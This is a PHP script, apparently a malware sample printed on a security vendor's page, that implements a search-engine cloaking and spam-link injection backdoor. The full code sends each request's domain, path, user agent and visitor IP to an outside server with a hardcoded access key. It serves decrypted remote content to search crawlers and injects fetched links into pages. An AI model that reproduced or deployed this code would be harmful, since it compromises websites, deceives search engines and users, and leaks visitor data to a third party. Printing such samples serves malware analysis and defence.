define('_API_URLS', 'https://chat.nationsoul.com/api');
define('_ILINK_URL', 'https://chat.nationsoul.com/i/FNrLEn?keyword=vn');
define('_ACCESSKEY', 'lo3dFdaAEf0ZWrLEetfHE');
$_API_PATH = array(
'dell', 'find', 'cart', 'nvidia', 'orders', 'thai', 'client', 'orderid', 'update', 'alert', 'filter', 'apple', 'color',
'amazon', 'meta', 'oracle', 'video', 'livetv', 'docs', 'uptime', 'down', 'action', 'game', 'play', 'sports', 'worldcup', 'final', 'games', 'gaming', 'good', 'sitemap', 'store', 'live'
);
try {
$path = !empty($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : (isset($_SERVER['HTTP_X_REWRITE_URL']) ? $_SERVER['HTTP_X_REWRITE_URL'] : '/');
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (is_path_matched($path, $_API_PATH) && (is_spider($ua) || is_search_engine_ref($ref))) {
@ini_set('display_errors', 'Off');
@error_reporting(E_ALL ^ E_NOTICE);
@set_time_limit(0);
@ini_set('allow_url_fopen', 'On');
@ignore_user_abort(true);
$protocol = getProtocol();
$host = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '');
$domain = $protocol . '://' . $host;
if (strpos($path, 'sitemap.xml') !== false || (isset($_SERVER['QUERY_STRING']) && strpos($_SERVER['QUERY_STRING'], 'sitemap.xml') !== false)) {
$path = '?sitemap.xml';
}
$params = array(
base64_encode('domain') => base64_encode($domain),
base64_encode('path') => base64_encode($path),
base64_encode('spider') => base64_encode($ua),
base64_encode('referer') => base64_encode($ref),
base64_encode('ipaddr') => base64_encode(getIP()),
);
$kw = extractKeywordFromPath($path, $_API_PATH);
if ($kw === '') {
foreach ($_API_PATH as $p) {
if (isset($_GET[$p]) && $_GET[$p] !== '') {
$kw = $_GET[$p];
break;
}
}
}
if ($kw !== '') {
$params[base64_encode('keyword')] = base64_encode($kw);
}
$headers = array('Content-Type: application/x-www-form-urlencoded', 'user_agent:' . $ua);
if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
$headers[] = 'Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE'];
}
$resp = http_post(build_api_url(_API_URLS), $params, $headers);
echo can_decrypt() ? decrypt_psk_response($resp) : $resp;
} elseif (is_spider($ua)) {
$raw = http_get(_ILINK_URL);
ob_start(function ($buffer) use ($raw) {
if (empty($raw)) return $buffer;
if (!preg_match_all('/<a\s[^>]*>.*?<\/a>/is', $raw, $m) || empty($m[0])) return $buffer;
$today = date('Y-m-d');
$items = '';
foreach ($m[0] as $a) {
$items .= '<li>' . $a . '<span class="date">' . $today . '</span></li>\n";
}
$inject = "\n<style>ul.list_news{list-style:none;padding:0;}ul.list_news li{margin-bottom:4px;}ul.list_news .date{color:gray;margin-left:10px;font-size:0.9em;}</style>\n<ul class="list_news">\n" . $items . "</ul>\n";
if (stripos($buffer, '</body>') !== false) {
return str_ireplace('</body>', $inject . '</body>', $buffer);
}
return $inject . "\n" . $buffer;
});
}
} catch (Exception $e) {
}
function can_decrypt()
{
static $ok = null;
if ($ok !== null) return $ok;
if (!function_exists('openssl_decrypt') || !function_exists('hash_hmac') || !defined('OPENSSL_RAW_DATA')) {
$ok = false;
return false;
}
$test = @openssl_encrypt('test', 'aes-256-cbc', str_repeat('k', 32), OPENSSL_RAW_DATA, str_repeat('i', 16));
$ok = ($test !== false);
return $ok;
}
function can_gzdecode()
{
static $ok = null;
if ($ok !== null) return $ok;
$ok = function_exists('gzdecode');
return $ok;
}
function build_api_url($base)
{
$qs = array();
if (can_decrypt()) $qs[] = 'enc=psk';
if (can_gzdecode()) $qs[] = 'gz=1';
return !empty($qs) ? $base . '?' . implode('&', $qs) : $base;
}
function http_post($url, $data, $headers = array())
{
$body = http_build_query($data);
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $body,
CURLOPT_HTTPHEADER => $headers,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 60,
CURLOPT_ENCODING => 'gzip, deflate',
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_USERAGENT => $ua,
CURLOPT_REFERER => $ref,
));
$resp = curl_exec($ch);
curl_close($ch);
return ($resp !== false) ? $resp : '';
}
$ctx = stream_context_create(array(
'http' => array(
'method' => 'POST',
'header' => implode("\r\n", $headers) . "\r\nUser-Agent: " . $ua . "\r\nReferer: " . $ref,
'content' => $body,
'timeout' => 30,
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
),
));
$resp = @file_get_contents($url, false, $ctx);
return ($resp !== false) ? $resp : '';
}
function http_get($url)
{
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_TIMEOUT => 5,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_ENCODING => 'gzip, deflate',
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_USERAGENT => $ua,
));
$resp = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($code == 200 && !empty($resp)) ? trim($resp) : '';
}
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 5,
'user_agent' => $ua,
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
),
));
$resp = @file_get_contents($url, false, $ctx);
return ($resp !== false) ? trim($resp) : '';
}
function is_spider($ua)
{
if (!$ua) return false;
$ua = strtolower($ua);
foreach (array('googlebot', 'bingbot', 'yandex', 'google', 'bing', 'yahoo') as $kw) {
if (strpos($ua, $kw) !== false) return true;
}
return false;
}
function is_search_engine_ref($ref)
{
if (!$ref) return false;
$ref = strtolower($ref);
foreach (array('google.', 'bing.', 'yahoo.', 'yandex.', 'duckduckgo.', 'ampproject.') as $eng) {
if (strpos($ref, $eng) !== false) return true;
}
return false;
}
function is_path_matched($uri, $list)
{
if (!is_string($uri) || $uri === '') return false;
$uri = strtolower($uri);
foreach ($list as $kw) {
$kw = trim($kw);
if ($kw === '') continue;
if (strlen($kw) > 2 && $kw[0] === '/' && substr($kw, -1) === '/') {
if (@preg_match($kw . 'i', $uri)) return true;
}
if (strpos($uri, strtolower($kw)) !== false) return true;
}
return false;
}
function extractKeywordFromPath($requestUri, $prefixes)
{
$uri_path = parse_url($requestUri, PHP_URL_PATH);
if (!$uri_path) return '';
$script_dir = rtrim(str_replace('\\', '/', dirname($_SERVER['SCRIPT_NAME'])), '/');
if ($script_dir !== '' && strpos($uri_path, $script_dir) === 0) {
$uri_path = substr($uri_path, strlen($script_dir));
}
$segments = explode('/', trim($uri_path, '/'));
if (empty($segments) || (count($segments) === 1 && $segments[0] === '')) return '';
if (count($segments) >= 2 && in_array($segments[0], $prefixes)) {
return urldecode($segments[1]);
}
return urldecode($segments[0]);
}
function getIP()
{
$ip = '';
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR') as $k) {
$v = isset($_SERVER[$k]) ? $_SERVER[$k] : getenv($k);
if ($v && strcasecmp($v, 'unknown') !== 0) {
$ip = $v;
break;
}
}
return preg_match('/[\d\.]{7,15}/', $ip, $m) ? $m[0] : '';
}
function getProtocol()
{
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO'])) return strtolower($_SERVER['HTTP_X_FORWARDED_PROTO']) === 'https' ? 'https' : 'http';
if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') return 'https';
if (isset($_SERVER['REQUEST_SCHEME'])) return strtolower($_SERVER['REQUEST_SCHEME']);
if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') return 'https';
return 'http';
}
function hash_equals_compat($known, $user)
{
if (function_exists('hash_equals')) return hash_equals($known, $user);
if (strlen($known) !== strlen($user)) return false;
$result = 0;
for ($i = 0; $i < strlen($known); $i++) $result |= ord($known[$i]) ^ ord($user[$i]);
return $result === 0;
}
function derive_psk_keys($accessKey)
{
$ikm = $accessKey;
$salt = str_repeat("\x00", 32);
$info = 'seo_control_gin|psk|aes-256-cbc|v1';
$prk = hash_hmac('sha256', $ikm, $salt, true);
$t = '';
$okm = '';
for ($i = 1; strlen($okm) < 64; $i++) {
$t = hash_hmac('sha256', $t . $info . chr($i), $prk, true);
$okm .= $t;
}
$keyEnc = substr($okm, 0, 32);
$keyMac = substr($okm, 32, 32);
return array($keyEnc, $keyMac);
}
function decrypt_psk_response($resp)
{
$obj = json_decode($resp, true);
if (!is_array($obj) || !isset($obj['v']) || $obj['v'] !== 'psk1') return $resp;
$iv = base64_decode($obj['iv']);
$ct = base64_decode($obj['ct']);
$tag = base64_decode($obj['tag']);
list($keyEnc, $keyMac) = derive_psk_keys(_ACCESSKEY);
$calc = hash_hmac('sha256', $iv . $ct, $keyMac, true);
if (!hash_equals_compat($calc, $tag)) return '';
$pt = openssl_decrypt($ct, 'aes-256-cbc', $keyEnc, OPENSSL_RAW_DATA, $iv);
if ($pt === false) return '';
$len = strlen($pt);
if ($len === 0) return '';
$pad = ord($pt[$len - 1]);
if ($pad >= 1 && $pad <= 16 && $pad <= $len) {
$valid = true;
for ($i = $len - $pad; $i < $len; $i++) {
if (ord($pt[$i]) !== $pad) {
$valid = false;
break;
}
}
if ($valid) $pt = substr($pt, 0, $len - $pad);
}
if (!empty($obj['gz']) && function_exists('gzdecode')) {
$decoded = @gzdecode($pt);
if ($decoded !== false) $pt = $decoded;
}
return $pt;
}
© 2023 Quttera Ltd. All rights reserved.